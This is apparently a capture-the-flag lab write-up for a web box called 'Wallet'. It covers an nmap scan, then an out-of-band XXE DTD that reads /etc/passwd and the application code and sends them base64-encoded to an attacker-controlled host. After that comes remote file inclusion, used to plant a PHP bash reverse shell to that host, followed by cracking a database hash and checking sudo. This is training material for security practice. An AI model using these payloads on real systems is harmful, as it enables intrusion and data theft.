Published on

Walllet Writeup

Authors
logo

Port Scanning

nmap -sV -sC -p- -v $IP --open

wallet

Enumeration

http://172.16.8.243

wallet 1

Registering a new user

wallet 2

After logging in, we gain access to the application. The Reports section stands out.

wallet 3

Intercepting with Burp shows that it's an XML request.

wallet 4
wallet 5

Since the response came back empty, we can test for Out-of-band XML External Entity (OOB XXE).

To test it, we'll create a .dtd file that will be referenced by the XML.

exploit.dtd

<!ENTITY % gabe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % param1 "<!ENTITY external SYSTEM 'http://10.0.31.150:1337/p?data=%gabe;'>">

<!DOCTYPE foo [ <!ENTITY % pe SYSTEM "http://10.0.1.150/exploit.dtd"> %pe; %param1; ]>
<foo>&external;</foo>
wallet 6
python3 -m http.server 80
wallet 7
nc -lnvp 1337
wallet 8

Decoding the base64 output confirms it's the server's /etc/passwd.

wallet 9

Using the same process, we can read the wallet.php file, which contains the application code.

exploit.dtd

<!ENTITY % gabe SYSTEM "php://filter/convert.base64-encode/resource=wallet.php">
<!ENTITY % param1 "<!ENTITY external SYSTEM 'http://10.0.31.150:1337/p?data=%gabe;'>">
wallet 10

Analyzing the code reveals a Remote File Inclusion (RFI) since it does a require_once on the wallets_balance parameter.

Foot Hold

Since we have an RFI, we create a reverse shell and pass it as the wallet_balance parameter.

<?php system("/bin/bash -c 'sh -i >& /dev/tcp/10.0.31.150/1337 0>&1'"); ?>
wallet 11
wallet 12
nc -lnvp 1337
wallet 13

Pivoting

Database password found in config.php.

wallet 14

Connecting to MySQL, we find the admin hash:

mysql -u satoshi -p

wallet 15

Used John the Ripper to crack the hash.

wallet 16

su admin

wallet 17

Privillege Escalation

sudo -l

wallet 18

Proof

wallet 19
Discuss on TwitterView on GitHub